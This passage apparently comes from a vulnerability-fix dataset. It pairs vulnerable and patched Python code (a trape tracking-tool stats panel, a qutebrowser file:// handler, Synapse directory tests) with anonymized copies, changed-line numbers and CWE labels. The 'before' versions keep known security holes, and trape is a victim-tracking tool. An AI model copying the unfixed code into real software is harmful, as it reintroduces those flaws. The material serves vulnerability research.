return json.dumps({'status':'OK', 'path' : VAR_0.home_path, 'victim_path' : VAR_0.victim_path, 'url_to_clone' : VAR_0.url_to_clone, 'app_port' : VAR_0.app_port, 'date_start' : VAR_0.date_start, 'user_ip' : '127.0.0.1'});
else:
return json.dumps({'status':'NOPE', 'path' : '/'});
@VAR_1.route("/get_data", methods=["POST"])
def FUNC_3():
VAR_4 = VAR_2.sentences_stats('get_data')
VAR_5 = VAR_2.sentences_stats('all_networks')
('clean_online')
VAR_6 = VAR_2.sentences_stats('get_clicks')
VAR_7 = VAR_6[0][0]
VAR_6 = VAR_2.sentences_stats('get_sessions')
VAR_8 = VAR_6[0][0]
VAR_6 = VAR_2.sentences_stats('get_online')
VAR_9 = VAR_6[0][0]
return json.dumps({'status' : 'OK', 'd' : VAR_4, 'n' : VAR_5, 'c' : VAR_7, 's' : VAR_8, 'o' : VAR_9});
@VAR_1.route("/get_preview", methods=["POST"])
def FUNC_4():
VAR_10 = request.form['vId']
VAR_4 = VAR_2.sentences_stats('get_preview', VAR_10)
VAR_5 = VAR_2.sentences_stats('id_networks', VAR_10)
return json.dumps({'status' : 'OK', 'vId' : VAR_10, 'd' : VAR_4, 'n' : VAR_5});
@VAR_1.route("/get_title", methods=["POST"])
def FUNC_5():
VAR_11 = urllib2.build_opener()
VAR_12 = VAR_11.open(VAR_0.url_to_clone).read()
VAR_12 = html[VAR_12.find('<title>') + 7 : VAR_12.find('</title>')]
return json.dumps({'status' : 'OK', 'title' : VAR_12});
@VAR_1.route("/get_requests", methods=["POST"])
def FUNC_6():
VAR_4 = VAR_2.sentences_stats('get_requests')
return json.dumps({'status' : 'OK', 'd' : VAR_4}); |
import urllib2
from flask import Flask, render_template, session, request, json
from core.trape import Trape
from core.db import Database
VAR_0 = Trape()
VAR_1 = Flask(__name__, template_folder='../templates', static_folder='../static')
VAR_2 = Database()
VAR_0.header()
@VAR_1.route("/" + VAR_0.stats_path)
def FUNC_0():
return render_template("/FUNC_2.html")
@VAR_1.route("/logout")
def FUNC_1():
return render_template("/FUNC_2.html")
@VAR_1.route("/login", methods=["POST"])
def FUNC_2():
VAR_3 = request.form['id']
if VAR_3 == VAR_0.stats_key:
return json.dumps({'status':'OK', 'path' : VAR_0.home_path, 'victim_path' : VAR_0.victim_path, 'url_to_clone' : VAR_0.url_to_clone, 'app_port' : VAR_0.app_port, 'date_start' : VAR_0.date_start, 'user_ip' : '127.0.0.1'});
else:
return json.dumps({'status':'NOPE', 'path' : '/'});
@VAR_1.route("/get_data", methods=["POST"])
def FUNC_3():
VAR_4 = VAR_2.sentences_stats('get_data')
VAR_5 = VAR_2.sentences_stats('all_networks')
VAR_6 = VAR_2.sentences_stats('get_clicks')
VAR_7 = VAR_6[0][0]
VAR_6 = VAR_2.sentences_stats('get_sessions')
VAR_8 = VAR_6[0][0]
VAR_9 = ('online', )
VAR_6 = VAR_2.sentences_stats('get_online', VAR_9)
VAR_10 = VAR_6[0][0]
return json.dumps({'status' : 'OK', 'd' : VAR_4, 'n' : VAR_5, 'c' : VAR_7, 's' : VAR_8, 'o' : VAR_10});
@VAR_1.route("/get_preview", methods=["POST"])
def FUNC_4():
VAR_9 = request.form['vId']
VAR_11 = (VAR_9,)
VAR_4 = VAR_2.sentences_stats('get_preview', VAR_11)
VAR_5 = VAR_2.sentences_stats('id_networks', VAR_11)
return json.dumps({'status' : 'OK', 'vId' : VAR_9, 'd' : VAR_4, 'n' : VAR_5});
@VAR_1.route("/get_title", methods=["POST"])
def FUNC_5():
VAR_12 = urllib2.build_opener()
VAR_13 = VAR_12.open(VAR_0.url_to_clone).read()
VAR_13 = html[VAR_13.find('<title>') + 7 : VAR_13.find('</title>')]
return json.dumps({'status' : 'OK', 'title' : VAR_13});
@VAR_1.route("/get_requests", methods=["POST"])
def FUNC_6():
VAR_4 = VAR_2.sentences_stats('get_requests')
return json.dumps({'status' : 'OK', 'd' : VAR_4}); | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
18,
19,
22,
23,
25,
26,
28,
32,
36,
44,
49,
57,
59,
66,
73,
77
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
18,
19,
22,
23,
25,
26,
28,
32,
36,
44,
49,
57,
59,
67,
74,
78
] |
3CWE-352
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
# Copyright 2015-2018 Antoni Boucher (antoyo) <bouanto@zoho.com>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
#
# pylint complains when using .render() on jinja templates, so we make it shut
# up for this whole module.
"""Handler functions for file:... pages."""
import os
from qutebrowser.browser.webkit.network import networkreply
from qutebrowser.utils import jinja
def get_file_list(basedir, all_files, filterfunc):
"""Get a list of files filtered by a filter function and sorted by name.
Args:
basedir: The parent directory of all files.
all_files: The list of files to filter and sort.
filterfunc: The filter function.
Return:
A list of dicts. Each dict contains the name and absname keys.
"""
items = []
for filename in all_files:
absname = os.path.join(basedir, filename)
if filterfunc(absname):
items.append({'name': filename, 'absname': absname})
return sorted(items, key=lambda v: v['name'].lower())
def is_root(directory):
"""Check if the directory is the root directory.
Args:
directory: The directory to check.
Return:
Whether the directory is a root directory or not.
"""
# If you're curious as why this works:
# dirname('/') = '/'
# dirname('/home') = '/'
# dirname('/home/') = '/home'
# dirname('/home/foo') = '/home'
# basically, for files (no trailing slash) it removes the file part, and
# for directories, it removes the trailing slash, so the only way for this
# to be equal is if the directory is the root directory.
return os.path.dirname(directory) == directory
def parent_dir(directory):
"""Return the parent directory for the given directory.
Args:
directory: The path to the directory.
Return:
The path to the parent directory.
"""
return os.path.normpath(os.path.join(directory, os.pardir))
def dirbrowser_html(path):
"""Get the directory browser web page.
Args:
path: The directory path.
Return:
The HTML of the web page.
"""
title = "Browse directory: {}".format(path)
if is_root(path):
parent = None
else:
parent = parent_dir(path)
try:
all_files = os.listdir(path)
except OSError as e:
html = jinja.render('error.html',
title="Error while reading directory",
url='file:///{}'.format(path), error=str(e))
return html.encode('UTF-8', errors='xmlcharrefreplace')
files = get_file_list(path, all_files, os.path.isfile)
directories = get_file_list(path, all_files, os.path.isdir)
html = jinja.render('dirbrowser.html', title=title, url=path,
parent=parent, files=files, directories=directories)
return html.encode('UTF-8', errors='xmlcharrefreplace')
def handler(request):
"""Handler for a file:// URL.
Args:
request: QNetworkRequest to answer to.
Return:
A QNetworkReply for directories, None for files.
"""
path = request.url().toLocalFile()
try:
if os.path.isdir(path):
data = dirbrowser_html(path)
return networkreply.FixedDataNetworkReply(
request, data, 'text/html')
return None
except UnicodeEncodeError:
return None
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
# Copyright 2015-2018 Antoni Boucher (antoyo) <bouanto@zoho.com>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
#
# pylint complains when using .render() on jinja templates, so we make it shut
# up for this whole module.
"""Handler functions for file:... pages."""
import os
from qutebrowser.browser.webkit.network import networkreply
from qutebrowser.utils import jinja
def get_file_list(basedir, all_files, filterfunc):
"""Get a list of files filtered by a filter function and sorted by name.
Args:
basedir: The parent directory of all files.
all_files: The list of files to filter and sort.
filterfunc: The filter function.
Return:
A list of dicts. Each dict contains the name and absname keys.
"""
items = []
for filename in all_files:
absname = os.path.join(basedir, filename)
if filterfunc(absname):
items.append({'name': filename, 'absname': absname})
return sorted(items, key=lambda v: v['name'].lower())
def is_root(directory):
"""Check if the directory is the root directory.
Args:
directory: The directory to check.
Return:
Whether the directory is a root directory or not.
"""
# If you're curious as why this works:
# dirname('/') = '/'
# dirname('/home') = '/'
# dirname('/home/') = '/home'
# dirname('/home/foo') = '/home'
# basically, for files (no trailing slash) it removes the file part, and
# for directories, it removes the trailing slash, so the only way for this
# to be equal is if the directory is the root directory.
return os.path.dirname(directory) == directory
def parent_dir(directory):
"""Return the parent directory for the given directory.
Args:
directory: The path to the directory.
Return:
The path to the parent directory.
"""
return os.path.normpath(os.path.join(directory, os.pardir))
def dirbrowser_html(path):
"""Get the directory browser web page.
Args:
path: The directory path.
Return:
The HTML of the web page.
"""
title = "Browse directory: {}".format(path)
if is_root(path):
parent = None
else:
parent = parent_dir(path)
try:
all_files = os.listdir(path)
except OSError as e:
html = jinja.render('error.html',
title="Error while reading directory",
url='file:///{}'.format(path), error=str(e))
return html.encode('UTF-8', errors='xmlcharrefreplace')
files = get_file_list(path, all_files, os.path.isfile)
directories = get_file_list(path, all_files, os.path.isdir)
html = jinja.render('dirbrowser.html', title=title, url=path,
parent=parent, files=files, directories=directories)
return html.encode('UTF-8', errors='xmlcharrefreplace')
def handler(request, _operation, _current_url):
"""Handler for a file:// URL.
Args:
request: QNetworkRequest to answer to.
_operation: The HTTP operation being done.
_current_url: The page we're on currently.
Return:
A QNetworkReply for directories, None for files.
"""
path = request.url().toLocalFile()
try:
if os.path.isdir(path):
data = dirbrowser_html(path)
return networkreply.FixedDataNetworkReply(
request, data, 'text/html')
return None
except UnicodeEncodeError:
return None
| xsrf | {
"code": [
"def handler(request):"
],
"line_no": [
114
]
} | {
"code": [
"def handler(request, _operation, _current_url):",
" _current_url: The page we're on currently."
],
"line_no": [
114,
120
]
} |
import os
from qutebrowser.browser.webkit.network import networkreply
from qutebrowser.utils import jinja
def FUNC_0(VAR_0, VAR_1, VAR_2):
VAR_6 = []
for filename in VAR_1:
VAR_11 = os.path.join(VAR_0, filename)
if VAR_2(VAR_11):
VAR_6.append({'name': filename, 'absname': VAR_11})
return sorted(VAR_6, key=lambda v: v['name'].lower())
def FUNC_1(VAR_3):
return os.path.dirname(VAR_3) == directory
def FUNC_2(VAR_3):
return os.path.normpath(os.path.join(VAR_3, os.pardir))
def FUNC_3(VAR_4):
VAR_7 = "Browse VAR_3: {}".format(VAR_4)
if FUNC_1(VAR_4):
VAR_12 = None
else:
VAR_12 = FUNC_2(VAR_4)
try:
VAR_1 = os.listdir(VAR_4)
except OSError as e:
VAR_10 = jinja.render('error.html',
VAR_7="Error while reading directory",
url='file:///{}'.format(VAR_4), error=str(e))
return VAR_10.encode('UTF-8', errors='xmlcharrefreplace')
VAR_8 = FUNC_0(VAR_4, VAR_1, os.path.isfile)
VAR_9 = FUNC_0(VAR_4, VAR_1, os.path.isdir)
VAR_10 = jinja.render('dirbrowser.html', VAR_7=title, url=VAR_4,
VAR_12=parent, VAR_8=files, VAR_9=directories)
return VAR_10.encode('UTF-8', errors='xmlcharrefreplace')
def FUNC_4(VAR_5):
VAR_4 = VAR_5.url().toLocalFile()
try:
if os.path.isdir(VAR_4):
VAR_13 = FUNC_3(VAR_4)
return networkreply.FixedDataNetworkReply(
VAR_5, VAR_13, 'text/html')
return None
except UnicodeEncodeError:
return None
|
import os
from qutebrowser.browser.webkit.network import networkreply
from qutebrowser.utils import jinja
def FUNC_0(VAR_0, VAR_1, VAR_2):
VAR_8 = []
for filename in VAR_1:
VAR_13 = os.path.join(VAR_0, filename)
if VAR_2(VAR_13):
VAR_8.append({'name': filename, 'absname': VAR_13})
return sorted(VAR_8, key=lambda v: v['name'].lower())
def FUNC_1(VAR_3):
return os.path.dirname(VAR_3) == directory
def FUNC_2(VAR_3):
return os.path.normpath(os.path.join(VAR_3, os.pardir))
def FUNC_3(VAR_4):
VAR_9 = "Browse VAR_3: {}".format(VAR_4)
if FUNC_1(VAR_4):
VAR_14 = None
else:
VAR_14 = FUNC_2(VAR_4)
try:
VAR_1 = os.listdir(VAR_4)
except OSError as e:
VAR_12 = jinja.render('error.html',
VAR_9="Error while reading directory",
url='file:///{}'.format(VAR_4), error=str(e))
return VAR_12.encode('UTF-8', errors='xmlcharrefreplace')
VAR_10 = FUNC_0(VAR_4, VAR_1, os.path.isfile)
VAR_11 = FUNC_0(VAR_4, VAR_1, os.path.isdir)
VAR_12 = jinja.render('dirbrowser.html', VAR_9=title, url=VAR_4,
VAR_14=parent, VAR_10=files, VAR_11=directories)
return VAR_12.encode('UTF-8', errors='xmlcharrefreplace')
def FUNC_4(VAR_5, VAR_6, VAR_7):
VAR_4 = VAR_5.url().toLocalFile()
try:
if os.path.isdir(VAR_4):
VAR_15 = FUNC_3(VAR_4)
return networkreply.FixedDataNetworkReply(
VAR_5, VAR_15, 'text/html')
return None
except UnicodeEncodeError:
return None
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
25,
27,
30,
31,
34,
39,
49,
50,
53,
56,
60,
61,
62,
63,
64,
65,
66,
67,
69,
70,
73,
76,
81,
82,
85,
88,
93,
98,
106,
112,
113,
116,
119,
132,
24,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
52,
53,
54,
55,
56,
57,
58,
59,
72,
73,
74,
75,
76,
77,
78,
79,
84,
85,
86,
87,
88,
89,
90,
91,
115,
116,
117,
118,
119,
120,
121,
122
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
25,
27,
30,
31,
34,
39,
49,
50,
53,
56,
60,
61,
62,
63,
64,
65,
66,
67,
69,
70,
73,
76,
81,
82,
85,
88,
93,
98,
106,
112,
113,
116,
121,
134,
24,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
52,
53,
54,
55,
56,
57,
58,
59,
72,
73,
74,
75,
76,
77,
78,
79,
84,
85,
86,
87,
88,
89,
90,
91,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mock import Mock
import synapse
import synapse.api.errors
from synapse.api.constants import EventTypes
from synapse.config.room_directory import RoomDirectoryConfig
from synapse.rest.client.v1 import directory, login, room
from synapse.types import RoomAlias, create_requester
from tests import unittest
from tests.test_utils import make_awaitable
class DirectoryTestCase(unittest.HomeserverTestCase):
""" Tests the directory service. """
def make_homeserver(self, reactor, clock):
self.mock_federation = Mock()
self.mock_registry = Mock()
self.query_handlers = {}
def register_query_handler(query_type, handler):
self.query_handlers[query_type] = handler
self.mock_registry.register_query_handler = register_query_handler
hs = self.setup_test_homeserver(
http_client=None,
resource_for_federation=Mock(),
federation_client=self.mock_federation,
federation_registry=self.mock_registry,
)
self.handler = hs.get_directory_handler()
self.store = hs.get_datastore()
self.my_room = RoomAlias.from_string("#my-room:test")
self.your_room = RoomAlias.from_string("#your-room:test")
self.remote_room = RoomAlias.from_string("#another:remote")
return hs
def test_get_local_association(self):
self.get_success(
self.store.create_room_alias_association(
self.my_room, "!8765qwer:test", ["test"]
)
)
result = self.get_success(self.handler.get_association(self.my_room))
self.assertEquals({"room_id": "!8765qwer:test", "servers": ["test"]}, result)
def test_get_remote_association(self):
self.mock_federation.make_query.return_value = make_awaitable(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}
)
result = self.get_success(self.handler.get_association(self.remote_room))
self.assertEquals(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}, result
)
self.mock_federation.make_query.assert_called_with(
destination="remote",
query_type="directory",
args={"room_alias": "#another:remote"},
retry_on_dns_fail=False,
ignore_backoff=True,
)
def test_incoming_fed_query(self):
self.get_success(
self.store.create_room_alias_association(
self.your_room, "!8765asdf:test", ["test"]
)
)
response = self.get_success(
self.handler.on_directory_query({"room_alias": "#your-room:test"})
)
self.assertEquals({"room_id": "!8765asdf:test", "servers": ["test"]}, response)
class TestCreateAlias(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.handler = hs.get_directory_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
# Create a test user.
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, user=self.test_user, tok=self.test_user_tok)
def test_create_alias_joined_room(self):
"""A user can create an alias for a room they're in."""
self.get_success(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, self.room_id,
)
)
def test_create_alias_other_room(self):
"""A user cannot create an alias for a room they're NOT in."""
other_room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.get_failure(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, other_room_id,
),
synapse.api.errors.SynapseError,
)
def test_create_alias_admin(self):
"""An admin can create an alias for a room they're NOT in."""
other_room_id = self.helper.create_room_as(
self.test_user, tok=self.test_user_tok
)
self.get_success(
self.handler.create_association(
create_requester(self.admin_user), self.room_alias, other_room_id,
)
)
class TestDeleteAlias(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.handler = hs.get_directory_handler()
self.state_handler = hs.get_state_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
# Create a test user.
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, user=self.test_user, tok=self.test_user_tok)
def _create_alias(self, user):
# Create a new alias to this room.
self.get_success(
self.store.create_room_alias_association(
self.room_alias, self.room_id, ["test"], user
)
)
def test_delete_alias_not_allowed(self):
"""A user that doesn't meet the expected guidelines cannot delete an alias."""
self._create_alias(self.admin_user)
self.get_failure(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
),
synapse.api.errors.AuthError,
)
def test_delete_alias_creator(self):
"""An alias creator can delete their own alias."""
# Create an alias from a different user.
self._create_alias(self.test_user)
# Delete the user's alias.
result = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def test_delete_alias_admin(self):
"""A server admin can delete an alias created by another user."""
# Create an alias from a different user.
self._create_alias(self.test_user)
# Delete the user's alias as the admin.
result = self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
def test_delete_alias_sufficient_power(self):
"""A user with a sufficient power level should be able to delete an alias."""
self._create_alias(self.admin_user)
# Increase the user's power level.
self.helper.send_state(
self.room_id,
"m.room.power_levels",
{"users": {self.test_user: 100}},
tok=self.admin_user_tok,
)
# They can now delete the alias.
result = self.get_success(
self.handler.delete_association(
create_requester(self.test_user), self.room_alias
)
)
self.assertEquals(self.room_id, result)
# Confirm the alias is gone.
self.get_failure(
self.handler.get_association(self.room_alias),
synapse.api.errors.SynapseError,
)
class CanonicalAliasTestCase(unittest.HomeserverTestCase):
"""Test modifications of the canonical alias when delete aliases.
"""
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.handler = hs.get_directory_handler()
self.state_handler = hs.get_state_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = self._add_alias(self.test_alias)
def _add_alias(self, alias: str) -> RoomAlias:
"""Add an alias to the test room."""
room_alias = RoomAlias.from_string(alias)
# Create a new alias to this room.
self.get_success(
self.store.create_room_alias_association(
room_alias, self.room_id, ["test"], self.admin_user
)
)
return room_alias
def _set_canonical_alias(self, content):
"""Configure the canonical alias state on the room."""
self.helper.send_state(
self.room_id, "m.room.canonical_alias", content, tok=self.admin_user_tok,
)
def _get_canonical_alias(self):
"""Get the canonical alias state of the room."""
return self.get_success(
self.state_handler.get_current_state(
self.room_id, EventTypes.CanonicalAlias, ""
)
)
def test_remove_alias(self):
"""Removing an alias that is the canonical alias should remove it there too."""
# Set this new alias as the canonical alias for this room
self._set_canonical_alias(
{"alias": self.test_alias, "alt_aliases": [self.test_alias]}
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(data["content"]["alt_aliases"], [self.test_alias])
# Finally, delete the alias.
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), self.room_alias
)
)
data = self._get_canonical_alias()
self.assertNotIn("alias", data["content"])
self.assertNotIn("alt_aliases", data["content"])
def test_remove_other_alias(self):
"""Removing an alias listed as in alt_aliases should remove it there too."""
# Create a second alias.
other_test_alias = "#test2:test"
other_room_alias = self._add_alias(other_test_alias)
# Set the alias as the canonical alias for this room.
self._set_canonical_alias(
{
"alias": self.test_alias,
"alt_aliases": [self.test_alias, other_test_alias],
}
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(
data["content"]["alt_aliases"], [self.test_alias, other_test_alias]
)
# Delete the second alias.
self.get_success(
self.handler.delete_association(
create_requester(self.admin_user), other_room_alias
)
)
data = self._get_canonical_alias()
self.assertEqual(data["content"]["alias"], self.test_alias)
self.assertEqual(data["content"]["alt_aliases"], [self.test_alias])
class TestCreateAliasACL(unittest.HomeserverTestCase):
user_id = "@test:test"
servlets = [directory.register_servlets, room.register_servlets]
def prepare(self, reactor, clock, hs):
# We cheekily override the config to add custom alias creation rules
config = {}
config["alias_creation_rules"] = [
{"user_id": "*", "alias": "#unofficial_*", "action": "allow"}
]
config["room_list_publication_rules"] = []
rd_config = RoomDirectoryConfig()
rd_config.read_config(config)
self.hs.config.is_alias_creation_allowed = rd_config.is_alias_creation_allowed
return hs
def test_denied(self):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT",
b"directory/room/%23test%3Atest",
('{"room_id":"%s"}' % (room_id,)).encode("ascii"),
)
self.assertEquals(403, channel.code, channel.result)
def test_allowed(self):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT",
b"directory/room/%23unofficial_test%3Atest",
('{"room_id":"%s"}' % (room_id,)).encode("ascii"),
)
self.assertEquals(200, channel.code, channel.result)
class TestRoomListSearchDisabled(unittest.HomeserverTestCase):
user_id = "@test:test"
servlets = [directory.register_servlets, room.register_servlets]
def prepare(self, reactor, clock, hs):
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT", b"directory/list/room/%s" % (room_id.encode("ascii"),), b"{}"
)
self.assertEquals(200, channel.code, channel.result)
self.room_list_handler = hs.get_room_list_handler()
self.directory_handler = hs.get_directory_handler()
return hs
def test_disabling_room_list(self):
self.room_list_handler.enable_room_list_search = True
self.directory_handler.enable_room_list_search = True
# Room list is enabled so we should get some results
request, channel = self.make_request("GET", b"publicRooms")
self.assertEquals(200, channel.code, channel.result)
self.assertTrue(len(channel.json_body["chunk"]) > 0)
self.room_list_handler.enable_room_list_search = False
self.directory_handler.enable_room_list_search = False
# Room list disabled so we should get no results
request, channel = self.make_request("GET", b"publicRooms")
self.assertEquals(200, channel.code, channel.result)
self.assertTrue(len(channel.json_body["chunk"]) == 0)
# Room list disabled so we shouldn't be allowed to publish rooms
room_id = self.helper.create_room_as(self.user_id)
request, channel = self.make_request(
"PUT", b"directory/list/room/%s" % (room_id.encode("ascii"),), b"{}"
)
self.assertEquals(403, channel.code, channel.result)
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mock import Mock
import synapse
import synapse.api.errors
from synapse.api.constants import EventTypes
from synapse.config.room_directory import RoomDirectoryConfig
from synapse.rest.client.v1 import directory, login, room
from synapse.types import RoomAlias, create_requester
from tests import unittest
from tests.test_utils import make_awaitable
class DirectoryTestCase(unittest.HomeserverTestCase):
""" Tests the directory service. """
def make_homeserver(self, reactor, clock):
self.mock_federation = Mock()
self.mock_registry = Mock()
self.query_handlers = {}
def register_query_handler(query_type, handler):
self.query_handlers[query_type] = handler
self.mock_registry.register_query_handler = register_query_handler
hs = self.setup_test_homeserver(
federation_http_client=None,
resource_for_federation=Mock(),
federation_client=self.mock_federation,
federation_registry=self.mock_registry,
)
self.handler = hs.get_directory_handler()
self.store = hs.get_datastore()
self.my_room = RoomAlias.from_string("#my-room:test")
self.your_room = RoomAlias.from_string("#your-room:test")
self.remote_room = RoomAlias.from_string("#another:remote")
return hs
def test_get_local_association(self):
self.get_success(
self.store.create_room_alias_association(
self.my_room, "!8765qwer:test", ["test"]
)
)
result = self.get_success(self.handler.get_association(self.my_room))
self.assertEquals({"room_id": "!8765qwer:test", "servers": ["test"]}, result)
def test_get_remote_association(self):
self.mock_federation.make_query.return_value = make_awaitable(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}
)
result = self.get_success(self.handler.get_association(self.remote_room))
self.assertEquals(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}, result
)
self.mock_federation.make_query.assert_called_with(
destination="remote",
query_type="directory",
args={"room_alias": "#another:remote"},
retry_on_dns_fail=False,
ignore_backoff=True,
)
def test_incoming_fed_query(self):
self.get_success(
self.store.create_room_alias_association(
self.your_room, "!8765asdf:test", ["test"]
)
)
response = self.get_success(
self.handler.on_directory_query({"room_alias": "#your-room:test"})
)
self.assertEquals({"room_id": "!8765asdf:test", "servers": ["test"]}, response)
class TestCreateAlias(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.handler = hs.get_directory_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
# Create a test user.
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, user=self.test_user, tok=self.test_user_tok)
def test_create_alias_joined_room(self):
"""A user can create an alias for a room they're in."""
self.get_success(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, self.room_id,
)
)
def test_create_alias_other_room(self):
"""A user cannot create an alias for a room they're NOT in."""
other_room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.get_failure(
self.handler.create_association(
create_requester(self.test_user), self.room_alias, other_room_id,
),
synapse.api.errors.SynapseError,
)
def test_create_alias_admin(self):
"""An admin can create an alias for a room they're NOT in."""
other_room_id = self.helper.create_room_as(
self.test_user, tok=self.test_user_tok
)
self.get_success(
self.handler.create_association(
create_requester(self.admin_user), self.room_alias, other_room_id,
)
)
class TestDeleteAlias(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
directory.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.handler = hs.get_directory_handler()
self.state_handler = hs.get_state_handler()
# Create user
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
# Create a test room
self.room_id = self.helper.create_room_as(
self.admin_user, tok=self.admin_user_tok
)
self.test_alias = "#test:test"
self.room_alias = RoomAlias.from_string(self.test_alias)
# Create a test user.
self.test_user = self.register_user("user", "pass", admin=False)
self.test_user_tok = self.login("user", "pass")
self.helper.join(room=self.room_id, user=self.test_user, tok=self.test_user_tok)
def _create_alias(self, user):
# Create a new alias to this room.
self.get_success(
self.store.create_room_alias_association(
self.room_alias, self.room_id, ["test"], user
)
)
def test_delete_alias_not_allowed(self):
